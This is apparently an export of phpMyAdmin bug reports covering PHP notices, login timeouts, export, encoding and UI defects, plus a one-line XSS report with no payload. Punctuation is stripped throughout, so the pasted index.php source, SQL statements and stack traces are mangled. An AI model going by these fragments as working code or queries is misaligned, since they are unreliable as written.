As an example SELECT COUNT ) FROM SELECT 1) AS TB or SELECT AVG 1) FROM SELECT 1) AS TB says Showing rows 0 1 0 total, Query took 0.0003 sec) on a database and Showing rows 0 24 209 total, 0 in query, Query took 0.0003 sec) on a table with 209 entries, though only one row with the expected value 1 is always returned.
I have not tested older PMA versions.
Original URL https sourceforge.net p phpmyadmin bugs 4249 Original author kyselejsyrecek Found in version 4.1.6","bug"
"24444","10641","Notice on export page.
This notice is displayed on database export page Notice in .
libraries navigation Nodes Node Database Container.class.php 33 Undefined index is create db priv Backtrace .
libraries navigation NodeFactory.class.php 93 Node Database Container > construct string root , integer 1, boolean false, ) .
libraries navigation NavigationTree.class.php 140 PMA NodeFactory getInstance string Node Database Container , string root , ) .
libraries navigation Navigation.class.php 47 PMA NavigationTree > construct ) .
navigation.php 70 PMA Navigation >getDisplay ) Original URL https sourceforge.net p phpmyadmin bugs 4250 Original author azurit Found in version 4.1.6","bug"
"24444","10642","Icon sprite broken in Original theme on STABLE branch 543db4a).
Icon sprite broken in Original theme on STABLE branch revision 543db4a) Original URL https sourceforge.net p phpmyadmin bugs 4251 Original author csware Found in version 4.1.6","bug"
"24444","10643","sql.js cannot read property.
See https reports.phpmyadmin.net reports view 1882 Original URL https sourceforge.net p phpmyadmin bugs 4520 Original author lem9 Found in version 4.2.7","bug"
"24444","10644","Database level permission bug for db names containing underscores.
Hi, it seems that PMA Util currentUserHasPrivilege ) is buggy in terms of database names containing underscores.
I have a user that doesn t have a global TRIGGER grant, for the specific database, however, it does.
Wondering why the Trigger tab isn t shown, I stumbled across this line in libraries Util.class.php query .= AND s REGEXP .
REPLACE REPLACE TABLE SCHEMA, , .
), , . )
; The database name is usr web121 24 and the user name is web121 .
The generated query looks like this SELECT `PRIVILEGE TYPE` FROM `INFORMATION SCHEMA`.`SCHEMA PRIVILEGES` WHERE GRANTEE= web121 localhost AND PRIVILEGE TYPE= TRIGGER AND usr\ web121\ 24 REGEXP REPLACE REPLACE TABLE SCHEMA, , .
), , . )
However, it doesn t return any rows.
There must be something wrong with the REGEXP part as this is working fine SELECT `PRIVILEGE TYPE` FROM `INFORMATION SCHEMA`.`SCHEMA PRIVILEGES` WHERE GRANTEE= web121 localhost AND PRIVILEGE TYPE= TRIGGER AND TABLE SCHEMA = usr\ web121\ 24 Original URL https sourceforge.net p phpmyadmin bugs 4252 Original author nischu7 Found in version 4.1.6","bug"
"24444","10645","New text in navigation frame acts like a database.
Testing with latest 4.1.6 dev).
After creating a new database, the New text from the navigation frame is sorted alphabetically as if it s a database name; it should stay at the top.
Additionally, it now acts like a database and can be expanded to show Events, Functions, and so on each of which contain a list of each database on the system.
This only seems to happen after creating a new database.
Original URL https sourceforge.net p phpmyadmin bugs 4253 Original author ibennetch Found in version 4.1.6","bug"
"24444","10646","Unable to log in after timeout had been exceeded cookie).
When logging in again after the timeout had been exceeded, PMA shows red rectangle in the main window with no error in it maybe it is a pmahome theme bug?)
error shown in the source code says Incorrect format parameter and there is the loading icon in the left side database panel.
Clicking on any link pops up a new timeout error with log in request again.
This happens on and on until I click Log out or delete the token from URL.
My auth type is cookie and I have the Do Not Track option enabled in Firefox if it helps.
The URL after a few timeout log in cycles I thing they were 3) http localhost phpMyAdmin index.php?db=og scheduler table=log target=import.php token=0ee5f2a3e8e0068854625e3b7e681629 PMAURL 0 index.php?db=og scheduler table=log server=1 target=import.php token=0ee5f2a3e8e0068854625e3b7e681629 Also, this bug may be related to these previously reported issues https sourceforge.net p phpmyadmin bugs 4227 https sourceforge.net p phpmyadmin bugs 4172 The issue persists in PMA 4.1.6.
Original URL https sourceforge.net p phpmyadmin bugs 4254 Original author kyselejsyrecek Found in version 4.1.0","bug"
"24444","10647","cant enter when session die.
When session die > we go to index.php?db=hosting table=users target=sql.php token=xxxxx and then we want enter again, but cant http poiuty.ru img 1cdfce111ce871ed4911e7daa173.png But when we go to > enter ok.
Original URL https sourceforge.net p phpmyadmin bugs 4255 Original author poiuty Found in version 4.1.6","bug"
"24444","10648","some erro in my phpmyadmin.
<?php vim set expandtab sw=4 ts=4 sts=4 Main loader script package PhpMyAdmin Gets some core libraries and displays a top message if required require once libraries common.inc.php ; display Git revision if requested require once libraries display git revision.lib.php ; pass variables to child pages drops = array lang , server , collation connection , db , table ); foreach drops as each drop) { if array key exists each drop, GET)) { unset GET[ each drop]); } } unset drops, each drop); If we have a valid target, let s load that script instead if !
empty REQUEST[ target ]) is string REQUEST[ target ]) !
preg match index , REQUEST[ target ]) in array REQUEST[ target ], goto whitelist) ) { include REQUEST[ target ]; exit; } Check if it is an ajax request to reload the recent tables list.
require once libraries RecentTable.class.php ; if GLOBALS[ is ajax request ] !
empty REQUEST[ recent table ])) { response = PMA Response getInstance ); response >addJSON options , PMA RecentTable getInstance ) >getHtmlSelectOption ) ); exit; } if GLOBALS[ PMA Config ] >isGitRevision )) { if isset REQUEST[ git revision ]) GLOBALS[ is ajax request ] == true) { PMA printGitRevision ); exit; } echo <div id= is git revision >< div> ; } Handles some variables that may have been sent by the calling script GLOBALS[ db ] = ; GLOBALS[ table ] = ; show query = 1 ; Any message to display?
if !
empty message)) { echo PMA Util getMessage message); unset message); } common url query = PMA URL getCommon , ); when server > 0, a server has been chosen so we can display all MySQL related information if server > 0) { include libraries server common.inc.php ; include libraries StorageEngine.class.php ; Use the verbose name of the server instead of the hostname if a value is set server info = ; if !
empty cfg[ Server ][ verbose ])) { server info .= htmlspecialchars cfg[ Server ][ verbose ]); if GLOBALS[ cfg ][ ShowServerInfo ]) { server info .= ; } } if GLOBALS[ cfg ][ ShowServerInfo ] || empty cfg[ Server ][ verbose ])) { server info .= GLOBALS[ dbi ] >getHostInfo ); } if !
empty cfg[ Server ][ verbose ]) GLOBALS[ cfg ][ ShowServerInfo ]) { server info .= ) ; } mysql cur user and host = GLOBALS[ dbi ] >fetchValue SELECT USER ); ); should we add the port info here?
short server info = !empty GLOBALS[ cfg ][ Server ][ verbose ]) ?
GLOBALS[ cfg ][ Server ][ verbose ] GLOBALS[ cfg ][ Server ][ host ]); } echo <div id= maincontainer > .
\n ; echo <div id= main pane left > ; if server > 0 || count cfg[ Servers ]) > 1 ) { if cfg[ DBG ][ demo ]) { echo <div class= group > ; echo <h2> .
phpMyAdmin Demo Server ) .
< h2> ; echo <p style= margin 0.5em 1em 0.5em 1em > ; printf You are using the demo server.
You can do anything here, but .
please do not change root, debian sys maint and pma users.
.
More information is available at s. ), <a href= http demo.phpmyadmin.net >demo.phpmyadmin.net< a> ); echo < p> ; echo < div> ; } echo <div class= group > ; echo <h2> .
General Settings ) .
< h2> ; echo <ul> ; Displays the MySQL servers choice form if cfg[ ServerDefault ] == 0 || !
cfg[ NavigationDisplayServers ] count cfg[ Servers ]) > 1 || server == 0 count cfg[ Servers ]) == 1))) ) { echo <li id= li select server class= no bullets > ; include once libraries select server.lib.php ; echo PMA Util getImage s host.png ) .
.
PMA selectServer true, true); echo < li> ; } Displays the mysql server related links if server > 0 !
PMA DRIZZLE) { include once libraries check user privileges.lib.php ; Logout for advanced authentication if cfg[ Server ][ auth type ] != config ) { if cfg[ ShowChgPassword ]) { conditional class = ajax ; PMA printListItem PMA Util getImage s passwd.png ) .
.
Change password ), li change password , user password.php?
.
common url query, null, null, change password anchor , no bullets , conditional class ); } } end if echo <li id= li select mysql collation class= no bullets > ; echo <form method= post action= index.php > .
\n .
PMA URL getHiddenInputs null, null, 4, collation connection ) .
<label for= select collation connection > .
\n .
.
PMA Util getImage s asci.png ) .
.
Server connection collation ) .
\n put the doc link in the form so that it appears on the same line .
PMA Util showMySQLDocu Charset connection ) .
.
\n .
< label> .
\n .
PMA generateCharsetDropdownBox PMA CSDROPDOWN COLLATION, collation connection , select collation connection , collation connection, true, 4, true ) .
< form> .
\n .
< li> .
\n ; } end of if server > 0 !PMA DRIZZLE) echo < ul> ; echo < div> ; } echo <div class= group > ; echo <h2> .
Appearance Settings ) .
< h2> ; echo <ul> ; Displays language selection combo if empty cfg[ Lang ]) count GLOBALS[ available languages ]) > 1) { echo <li id= li select lang class= no bullets > ; include once libraries display select lang.lib.php ; echo PMA Util getImage s lang.png ) .
.
PMA getLanguageSelectorHtml ); echo < li> ; } ThemeManager if available if GLOBALS[ cfg ][ ThemeManager ]) { echo <li id= li select theme class= no bullets > ; echo PMA Util getImage s theme.png ) .
.
SESSION[ PMA Theme Manager ] >getHtmlSelectBox ); echo < li> ; } echo <li id= li select fontsize > ; echo PMA Config getFontsizeForm ); echo < li> ; echo < ul> ; User preferences if server > 0) { echo <ul> ; PMA printListItem PMA Util getImage b tblops.png ).
.
More settings ), li user preferences , prefs manage.php?
.
common url query, null, null, null, no bullets ); echo < ul> ; } echo < div> ; echo < div> ; echo <div id= main pane right > ; if server > 0 GLOBALS[ cfg ][ ShowServerInfo ]) { echo <div class= group > ; echo <h2> .
Database server ) .
< h2> ; echo <ul> .
\n ; PMA printListItem Server ) .
.
server info, li server info ); PMA printListItem Server type ) .
.
PMA Util getServerType ), li server type ); PMA printListItem Server version ) .
.
PMA MYSQL STR VERSION .
.
PMA MYSQL VERSION COMMENT, li server version ); PMA printListItem Protocol version ) .
.
GLOBALS[ dbi ] >getProtoInfo ), li mysql proto ); PMA printListItem User ) .
.
htmlspecialchars mysql cur user and host), li user info ); echo <li id= li select mysql charset > ; echo .
Server charset ) .
.
<span lang= en dir= ltr > ; if !
PMA DRIZZLE) { echo .
mysql charsets descriptions[ mysql charset map[ utf 8 ]]; } echo .
mysql charset map[ utf 8 ] . )
.
< span> .
< li> .
< ul> .
< div> ; } if GLOBALS[ cfg ][ ShowServerInfo ] || GLOBALS[ cfg ][ ShowPhpInfo ]) { echo <div class= group > ; echo <h2> .
Web server ) .
< h2> ; echo <ul> ; if GLOBALS[ cfg ][ ShowServerInfo ]) { PMA printListItem SERVER[ SERVER SOFTWARE ], li web server software ); if server > 0) { client version str = GLOBALS[ dbi ] >getClientInfo ); if preg match \d \.\d \.\d , client version str) in array GLOBALS[ cfg ][ Server ][ extension ], array mysql , mysqli ) ) ) { client version str = libmysql .
client version str; } PMA printListItem Database client version ) .
.
client version str, li mysql client version ); php ext string = PHP extension ) .
.
GLOBALS[ cfg ][ Server ][ extension ] .
.
PMA Util showPHPDocu book.
.
GLOBALS[ cfg ][ Server ][ extension ] .
.php ); PMA printListItem php ext string, li used php extension ); } } if cfg[ ShowPhpInfo ]) { PMA printListItem Show PHP information ), li phpinfo , phpinfo.php?
.
common url query, null, blank ); } echo < ul> ; echo < div> ; } echo <div class= group pmagroup > ; echo <h2>phpMyAdmin< h2> ; echo <ul> ; class = null; We rely on CSP to allow access to http www.phpmyadmin.net, but IE lacks support here and does not allow request to http once using https.
if GLOBALS[ cfg ][ VersionCheck ] !
GLOBALS[ PMA Config ] >get is https ) || PMA USR BROWSER AGENT != IE ) ) { class = jsversioncheck ; } PMA printListItem Version information ) .
.
PMA VERSION, li pma version , null, null, null, null, class ); PMA printListItem Documentation ), li pma docs , PMA Util getDocuLink index ), null, blank ); PMA printListItem Wiki ), li pma wiki , PMA linkURL http wiki.phpmyadmin.net ), null, blank ); does not work if no target specified, don t know why PMA printListItem Official Homepage ), li pma homepage , PMA linkURL http www.phpMyAdmin.net ), null, blank ); PMA printListItem Contribute ), li pma contribute , PMA linkURL http www.phpmyadmin.net home page improve.php ), null, blank ); PMA printListItem Get support ), li pma support , PMA linkURL http www.phpmyadmin.net home page support.php ), null, blank ); PMA printListItem List of changes ), li pma changes , PMA linkURL changelog.php ), null, blank ); echo < ul> ; echo < div> ; echo < div> ; echo < div> ; Warning if using the default MySQL privileged account if server != 0 cfg[ Server ][ user ] == root cfg[ Server ][ password ] == ) { trigger error Your configuration file contains settings root with no password) .
that correspond to the default MySQL privileged account.
.
Your MySQL server is running with this default, is open to .
intrusion, and you really should fix this security hole by .
setting a password for user \ root\ .
), E USER WARNING ); } As we try to handle charsets by ourself, mbstring overloads just break it, see bug 1063821. if extension loaded mbstring ) ini get mbstring.func overload ) > 1) { trigger error You have enabled mbstring.func overload in your PHP .
configuration.
This option is incompatible with phpMyAdmin .
and might cause some data to be corrupted!
), E USER WARNING ); } mbstring is used for handling multibyte inside parser, so it is good to tell user something might be broken without it, see bug 1063149. if !
extension loaded mbstring )) { trigger error The mbstring PHP extension was not found and you seem to be using .
a multibyte charset.
Without the mbstring extension phpMyAdmin .
is unable to split strings correctly and it may result in .
unexpected results.
), E USER WARNING ); } Check whether session.gc maxlifetime limits session validity.
gc time = int) ini get session.gc maxlifetime ); if gc time < GLOBALS[ cfg ][ LoginCookieValidity ] ) { trigger error Your PHP parameter [a http php.net manual en session.configuration.php ini.session.gc maxlifetime blank]session.gc maxlifetime[ a] is lower than cookie validity configured in phpMyAdmin, because of this, your login will expire sooner than configured in phpMyAdmin.
), E USER WARNING ); } Check whether LoginCookieValidity is limited by LoginCookieStore.
if GLOBALS[ cfg ][ LoginCookieStore ] != 0 GLOBALS[ cfg ][ LoginCookieStore ] < GLOBALS[ cfg ][ LoginCookieValidity ] ) { trigger error Login cookie store is lower than cookie validity configured in phpMyAdmin, because of this, your login will expire sooner than configured in phpMyAdmin.
), E USER WARNING ); } Check if user does not have defined blowfish secret and it is being used.
if !
empty SESSION[ auto blowfish secret ]) empty GLOBALS[ cfg ][ blowfish secret ]) ) { trigger error The configuration file now needs a secret passphrase blowfish secret).
), E USER WARNING ); } Check for existence of config directory which should not exist in production environment.
if file exists config )) { trigger error Directory [code]config[ code], which is used by the setup script, still exists in your phpMyAdmin directory.
It is strongly recommended to remove it once phpMyAdmin has been configured.
Otherwise the security of your server may be compromised by unauthorized people downloading your configuration.
), E USER WARNING ); } if server > 0) { cfgRelation = PMA getRelationsParam ); if !
cfgRelation[ allworks ] cfg[ PmaNoRelation DisableWarning ] == false ) { msg = PMA Message notice The phpMyAdmin configuration storage is not completely configured, some extended features have been deactivated.
To find out why click shere s. )); msg >addParam <a href= .
cfg[ PmaAbsoluteUri ] .
chk rel.php?
.
common url query .
> , false ); msg >addParam < a> , false); Show error if user has configured something, notice elsewhere if !empty cfg[ Servers ][ server][ pmadb ])) { msg >isError true); } msg >display ); } end if } Warning about different MySQL library and server version a difference on the third digit does not count).
If someday there is a constant that we can check about mysqlnd, we can use it instead of strpos ).
If no default server is set, GLOBALS[ dbi ] is not defined yet.
Drizzle can speak MySQL protocol, so don t warn about version mismatch for Drizzle servers.
if isset GLOBALS[ dbi ]) !PMA DRIZZLE cfg[ ServerLibraryDifference DisableWarning ] == false ) { client info = GLOBALS[ dbi ] >getClientInfo ); if server > 0 strpos client info, mysqlnd ) === false substr PMA MYSQL CLIENT API, 0, 3) != substr PMA MYSQL INT VERSION, 0, 3) ) { trigger error PMA sanitize sprintf Your PHP MySQL library version s differs from your MySQL server version s. This may cause unpredictable behavior.
), client info, substr PMA MYSQL STR VERSION, 0, strpos PMA MYSQL STR VERSION .
, ) ) ) ), E USER NOTICE ); } unset client info); } Warning about Suhosin only if its simulation mode is not enabled if cfg[ SuhosinDisableWarning ] == false ini get suhosin.request.max value length ) ini get suhosin.simulation ) == 0 ) { trigger error sprintf Server running with Suhosin.
Please refer to sdocumentation s for possible issues.
), [doc faq1 38] , [ doc] ), E USER WARNING ); } Warning about mcrypt.
if !
function exists mcrypt encrypt ) !
GLOBALS[ cfg ][ McryptDisableWarning ] ) { PMA warnMissingExtension mcrypt ); } Warning about incomplete translations.
The data file is created while creating release by .
scripts remove incomplete mo if file exists libraries language stats.inc.php )) { include libraries language stats.inc.php ; This message is intentionally not translated, because we re handling incomplete translations here and focus on english speaking users.
if isset GLOBALS[ language stats ][ lang]) GLOBALS[ language stats ][ lang] < cfg[ TranslationWarningThreshold ] ) { trigger error You are using an incomplete translation, please help to make it .
better by [a http www.phpmyadmin.net home page improve.php .
translate blank]contributing[ a].
, E USER NOTICE ); } } prints list item for main page param string name displayed text param string id id, used for css styles param string url make item as link with url as target param string mysql help page display a link to MySQL s manual param string target special target for url param string a id id for the anchor, used for jQuery to hook in functions param string class class for the li element param string a class class for the anchor element return void function PMA printListItem name, id = null, url = null, mysql help page = null, target = null, a id = null, class = null, a class = null ) { echo <li id= .
id .
; if null !== class) { echo class= .
class .
; } echo > ; if null !== url) { echo <a href= .
url .
; if null !== target) { echo target= .
target .
; } if null != a id) { echo id= .
a id .
; } if null != a class) { echo class= .
a class .
; } echo > ; } echo name; if null !== url) { echo < a> .
\n ; } if null !== mysql help page) { echo PMA Util showMySQLDocu mysql help page); } echo < li> ; } ?> Original URL https sourceforge.net p phpmyadmin bugs 4256 Original author hibrium Found in version 3.3.7","bug"
"24444","10649","Hide fractional seconds when applicable.
Also see bug 4190.
Fractional seconds should be hidden if the table definition did not specify that they should be stored.
Specifically, N digits should be shown and be editable in the timepicker) where N is the number for that field in the definition.
But in MySQL before 5.6.4, fractional seconds are not even supported for most data types.
phpMyAdmin however still displays .000000 after every value, for e.g.
TIMESTAMPs.
Please note that the default, when omiting N in the definition, is 0 in MySQL since 5.6.4), whereas the default is 6 in standard SQL.
So for backwards compatibility, they should really be hidden.
People that didn t update their MySQL are suddenly seeing all those zeros, while they can t even be stored in their current definition) anyway.
Original URL https sourceforge.net p phpmyadmin bugs 4257 Original author sygmoral Found in version 4.1.6","bug"
"24444","10650","Grid editing broken on QA 4 1 and master.
Performing any grid editing results in 500 Internal Server Error Original URL https sourceforge.net p phpmyadmin bugs 4258 Original author madhuracj Found in version Latest Git","bug"
"24444","10651","reCaptcha sound session expired problem.
I have two problems with playing sound in reCaptcha 1.)
When i click on button which should read the captcha, no sound is played but this is maybe problem on my side).
2.)
Then when i click on text button which should replay the sound again the button is displayed instead of captcha image when you enable reading), phpmyadmin shows error Your session has expired.
Please log in again.
.
Original URL https sourceforge.net p phpmyadmin bugs 4259 Original author azurit Found in version 4.2.3","bug"
"24444","10652","Maximum execution time of 30 seconds exceeded in phpmyadmin libraries StringMB.class.php on line 55.
When I open the dashboard, after some time the ajax dialog tells me ERROR 500 PHP log says [15 Sep 2014 10 57 47 Europe Berlin] PHP Stack trace [15 Sep 2014 10 57 47 Europe Berlin] PHP 1.
{main} ) var www phpmyadmin index.php 0 [15 Sep 2014 10 57 47 Europe Berlin] PHP 2.
PMA printGitRevision ) var www phpmyadmin index.php 74 [15 Sep 2014 10 57 47 Europe Berlin] PHP 3.
PMA Config >checkGitRevision ) var www phpmyadmin libraries display git revision.lib.php 26 [15 Sep 2014 10 57 47 Europe Berlin] PHP 4.
PMA String >substr ) var www phpmyadmin libraries Config.class.php 589 [15 Sep 2014 10 57 47 Europe Berlin] PHP 5.
PMA StringMB >substr ) var www phpmyadmin libraries String.class.php 127 [15 Sep 2014 10 57 47 Europe Berlin] PHP 6.
PMA StringMB >strlen ) var www phpmyadmin libraries StringMB.class.php 47 [15 Sep 2014 10 57 47 Europe Berlin] PHP 7. mb strlen ) var www phpmyadmin libraries StringMB.class.php 33 [15 Sep 2014 10 58 18 Europe Berlin] PHP Fatal error Maximum execution time of 30 seconds exceeded in var www phpmyadmin libraries StringMB.class.php on line 55 [15 Sep 2014 10 58 18 Europe Berlin] PHP Stack trace [15 Sep 2014 10 58 18 Europe Berlin] PHP 1.
{main} ) var www phpmyadmin index.php 0 [15 Sep 2014 10 58 18 Europe Berlin] PHP 2.
PMA printGitRevision ) var www phpmyadmin index.php 74 [15 Sep 2014 10 58 18 Europe Berlin] PHP 3.
PMA Config >checkGitRevision ) var www phpmyadmin libraries display git revision.lib.php 26 [15 Sep 2014 10 58 18 Europe Berlin] PHP 4.
PMA String >substr ) var www phpmyadmin libraries Config.class.php 589 [15 Sep 2014 10 58 18 Europe Berlin] PHP 5.
PMA StringMB >substr ) var www phpmyadmin libraries String.class.php 127 [15 Sep 2014 10 58 18 Europe Berlin] PHP 6. mb substr ) var www phpmyadmin libraries StringMB.class.php 55 Original URL https sourceforge.net p phpmyadmin bugs 4533 Original author rm km it Found in version Latest Git","bug"
"24444","10653","reCaptcha is ignoring language settings.
Language of reCaptcha should be set to the same language as phpMyAdmin just try to change language on login page, reCaptcha is still displayed with language of your browser.
Original URL https sourceforge.net p phpmyadmin bugs 4260 Original author azurit Found in version 4.1.6","bug"
"24444","10654","Export bug.
Need to declare primary keys in the same statement of auto increment declarations.
To reproduce create this table DROP TABLE IF EXISTS `jossec123 assets`; !40101 SET saved cs client = character set client ; !40101 SET character set client = utf8 ; CREATE TABLE `jossec123 assets` `id` int 10) unsigned NOT NULL AUTO INCREMENT COMMENT Primary Key , `parent id` int 11) NOT NULL DEFAULT 0 COMMENT Nested set parent.
, `lft` int 11) NOT NULL DEFAULT 0 COMMENT Nested set lft.
, `rgt` int 11) NOT NULL DEFAULT 0 COMMENT Nested set rgt.
, `level` int 10) unsigned NOT NULL COMMENT The cached level in the nested tree.
, `name` varchar 50) NOT NULL COMMENT The unique name for the asset.\n , `title` varchar 100) NOT NULL COMMENT The descriptive title for the asset.
, `rules` varchar 5120) NOT NULL COMMENT JSON encoded access control.
, PRIMARY KEY `id`), UNIQUE KEY `idx asset name` `name`), KEY `idx lft rgt` `lft`,`rgt`), KEY `idx parent id` `parent id`) ) ENGINE=InnoDB AUTO INCREMENT=219 DEFAULT CHARSET=utf8; !40101 SET character set client = saved cs client ; Export it via phpmyadmin and you get Table structure for table `jossec123 assets` CREATE TABLE IF NOT EXISTS `jossec123 assets` `id` int 10) unsigned NOT NULL AUTO INCREMENT COMMENT Primary Key , `parent id` int 11) NOT NULL DEFAULT 0 COMMENT Nested set parent.
, `lft` int 11) NOT NULL DEFAULT 0 COMMENT Nested set lft.
, `rgt` int 11) NOT NULL DEFAULT 0 COMMENT Nested set rgt.
, `level` int 10) unsigned NOT NULL COMMENT The cached level in the nested tree.
, `name` varchar 50) NOT NULL COMMENT The unique name for the asset.\n , `title` varchar 100) NOT NULL COMMENT The descriptive title for the asset.
, `rules` varchar 5120) NOT NULL COMMENT JSON encoded access control. )
ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO INCREMENT=219 ; Notice that there is an AUTO INCREMENT but not a PRIMARY KEY in the create statement.
I know now index are added at end, in fact i ve this at the end of the sql export file Indexes for table `jossec123 assets` ALTER TABLE `jossec123 assets` ADD PRIMARY KEY `id`), ADD UNIQUE KEY `idx asset name` `name`), ADD UNIQUE KEY `id` `id`), ADD UNIQUE KEY `id 2` `id`), ADD KEY `idx lft rgt` `lft`,`rgt`), ADD KEY `idx parent id` `parent id`); But the sad is that if i try to upload it in another phpmyadmin or mysql server that last statement never gets executed because auto increment column need to be declared also as a key in the atomic create table operation and the import operation fails with this error 1075 Incorrect table definition; there can be only one auto column and it must be defined as a key Original URL https sourceforge.net p phpmyadmin bugs 4261 Original author creativedotit Found in version Latest Git","bug"
"24444","10655","Japanese character encoding not working properly when exporting from phpmyadmin.. Hello, I have been experiencing a problem that phpmyadmin does not encode the data to chosen charcter set when exporting as CSV file by export.php.
It s not only CSV format but perhaps all of kind of format available on export.php.
My database MySQL5.1 is set to use UTF 8 as its character set and I use Japanese character incuding Kanji.
I can see them correctly on phpmyadmin when I execute SQL on it but when exporting the result of a query to a file they get corrupted.
I have found the solution and I would like you to include it to the future fix.
Adding knjenc , into the array post params will fix this problem.
GLOBALS[ knjenc ] is needed on line 336 of export.php to encode SQL query result into the user choice encoding but it it not in the array GLOBALS as it is not in the array post params .
I would like you to confirm this is the right way of fixing this problem and put same kind of fix in the near future release if possible.
Best regards, Yukihisa Kitagawa Original URL https sourceforge.net p phpmyadmin bugs 4263 Original author trippyboy Found in version 4.1.6","bug"
"24444","10656","Uncheck Ignore while inserting, upon leaving a textarea.
While inserting, the Ignore checkbox is on for all but the first entry.
They are gradually unchecked as you start filling the fields for their corresponding entries.
Except this does not work for textareas in dynamically added rows.
It works in the second row which was already there on pageload), but when you use restart with 5 , the next ones do not work.
Note I ve only seen it fail on textareas; for normal textfields it does work.
For testing create a table with just a VARCHAR 255).
Go to the insert interface, restart with 5 , and fill something in for each row.
Watch the Ignore checkbox clearing on the second row, but not the rest.
I m assuming it s a .bind ) instead of .on ) issue in some javascript file.
Original URL https sourceforge.net p phpmyadmin bugs 4264 Original author sygmoral Found in version 4.1.6","bug"
"24444","10657","Reload navigation panel button doesn t kee New database link on top.
When using the Reload navigation panel button, the New database link gets sorted alphabetically instead of staying on top of the list Original URL https sourceforge.net p phpmyadmin bugs 4267 Original author spider 007 Found in version 4.1.6","bug"
"24444","10658","Wrong Time format 00 00 00.000000 ).
PMA version 4.1.6 In view and edit modes time format 00 00 00.000000 Example field => `time1` time NOT NULL DEFAULT 00 00 00 ) value => 16 15 08.000000 instead 16 15 08 Original URL https sourceforge.net p phpmyadmin bugs 4268 Original author verbum Found in version 4.1.6","bug"
"24444","10659","Notice on table relation page.
On the table relation page, this notice is displayed > Notice in .\tbl relation.php 152 > Undefined variable existrel foreign Original URL https sourceforge.net p phpmyadmin bugs 4269 Original author zweisteinsoft Found in version 4.1.6","bug"
"24444","10660","Changing column name can break saved order by clause.
If you use the new drag and drop sort tools to sort by a field, then later change the field name, the saved sort still remains and you get an error 1054 Unknown column OLD FIELDNAME in order clause Original URL https sourceforge.net p phpmyadmin bugs 4543 Original author dalesarver Found in version 4.2.9","bug"
"24444","10661","XSS vulnerabilities in table search and table structure pages.
With a crafted enum value it is possible to trigger an XSS in table search and table structure pages.
Original URL https sourceforge.net p phpmyadmin bugs 4544 Original author madhuracj Found in version 4.0.10","bug"
"24444","10662","Bad text color for table comments.
Hey guys, if I set a table comment the text color of it is very dark.
The background is dark to and now it is difficult to read.
Here a little screenshot of it.
Original URL https sourceforge.net p phpmyadmin bugs 4270 Original author dennis1993 Found in version 4.1.6 Attachment http sourceforge.net p phpmyadmin bugs 4270 attachment badcolor.png","bug"
"24444","10663","Contest 3 Query by example and the second criteria line.
Open a database and click on Query.
If you select a column, tick Show and enter two lines of criteria, you should be able to see all criteria generated when clicking on Update query .
This works in version 3.5.x but in 4.0 and 4.1, the second line of criteria has no effect.
Original URL https sourceforge.net p phpmyadmin bugs 4271 Original author lem9 Found in version 4.1.6","bug"
"24444","10664","Contest 4 Incorrect tabindex.
Start with this structure CREATE TABLE IF NOT EXISTS `t1` `c1` int 11) NOT NULL, `c2` int 11) NOT NULL, `c3` text NOT NULL, PRIMARY KEY `c1`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; Open the table and click on Insert.
You ll see that you can use the tab key to go from one value to the next.
Now, use the Continue insertion with 5 rows dialog and you ll see that the tabindex is broken.
Original URL https sourceforge.net p phpmyadmin bugs 4272 Original author lem9 Found in version 4.1.6","bug"
"24444","10665","Table dragging broken in designer.
Table dragging is broken in the designer and git bisect tells that 42223e1bf658e721359ccfb8b19fbad292b7c4e8 is the first bad commit.
Original URL https sourceforge.net p phpmyadmin bugs 4549 Original author madhuracj Found in version Latest Git","bug"
"24444","10666","New user cannot log in.
Created a new MySQL user account with a password, and for host id.
When I try to log in, either remotely or from the LAN the server is on, I get a message that the username or password are incorrect and login failed.
I checked the user account settings in MySQL Workbench and they match what phpMyAdmin shows.
Why is the login being rejected?
My other account logins still work fine.
Original URL https sourceforge.net p phpmyadmin bugs 4273 Original author roblewis Found in version 4.0.9","bug"
"24444","10667","JS error and can t send the error report.
Hey guys, if I edit an index or delete one, I see this error on the bottom auf phpMyAdmin.
> { exception { mode onerror , message TypeError url is undefined , stack [ { line 154, func refreshMain , context [ return void , , refreshMain function url, callback) { , if !
url) { , url = selflink a ).attr href ); , url = url.substring 0, url.indexOf ?
)); , } , url = PMA commonParams.getUrlQuery ); , , {href url}) , .appendTo body ) , .click ) ], filename common.js } ], useragent Mozilla 5.0 Windows NT 6.3; WOW64; rv 27.0) Gecko 20100101 Firefox 27.0 , uri tbl structure.php?
}, script name tbl structure.php , pma version 4.1.6 , browser name FIREFOX , browser version 27.0 , user os Win , server software Apache 2.4.7 Win32) OpenSSL 1.0.1e PHP 5.5.6 , user agent string Mozilla 5.0 Windows NT 6.3; WOW64; rv 27.0) Gecko 20100101 Firefox 27.0 , locale de , configuration storage enabled , php version 5.5.6 , microhistory { current index 0 } } If I will send it to you with the button Fehlerbericht senden I see this error >Danke fxc3xbcr die xc3x9cbermittlung dieses Berichts.
Die xc3x9cbertragung ist fehlgeschlagen.
Wenn Sie einen Fehler entdecken, senden Sie bitte einen manuellen Fehlerbericht.
Bitte aktualisieren Sie die Seite.
Can anyone reproduce and fix it, please?
Thank you!
Original URL https sourceforge.net p phpmyadmin bugs 4274 Original author dennis1993 Found in version 4.1.6","bug"
"24444","10668","Add index dialog does not open on choosing index from create table page.
Steps 1.
Open create table interface page 2.
Select any option from Index dropdown.
3.
Add Index dialog does not appear Stuck at Loading... ) Edit 1 I have configured 2 servers.
On server 1 it works fine but when I am logged in to server 2 it does not work.
So, seems like it is passing wrong server number or not at all passing server number.
Original URL https sourceforge.net p phpmyadmin bugs 4553 Original author chirayu45 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4553 attachment Screenshot 20from 202014 10 06 2013 3A13 3A17.png","bug"
"24444","10669","Broken Link to php extension manual.
<b>Broken link to php manual.
< b> On the index page of PMA, a link of php extensions manual is broken.
See the image attached.)
I suppose it happens because my system does not have any php extension or may be it is not able to find it from configuration files.
I explored the code and found that the mistake is [here] https github.com phpmyadmin phpmyadmin blob master index.php L311).
In my system it prints GLOBALS[ cfg ][ Server ][ extension ] as NULL.
So link generated is broken one.
In such a case it should put some text like None or something in place of broken link.
Original URL https sourceforge.net p phpmyadmin bugs 4275 Original author playingdj Found in version 4.1.6 Attachment http sourceforge.net p phpmyadmin bugs 4275 attachment Screenshot 20from 202014 02 06 2013 3A37 3A10.png","bug"
"24444","10670","Fast filters for tables,views etc.
should be governed by NavigationTreeDisplayItemFilterMinimum.
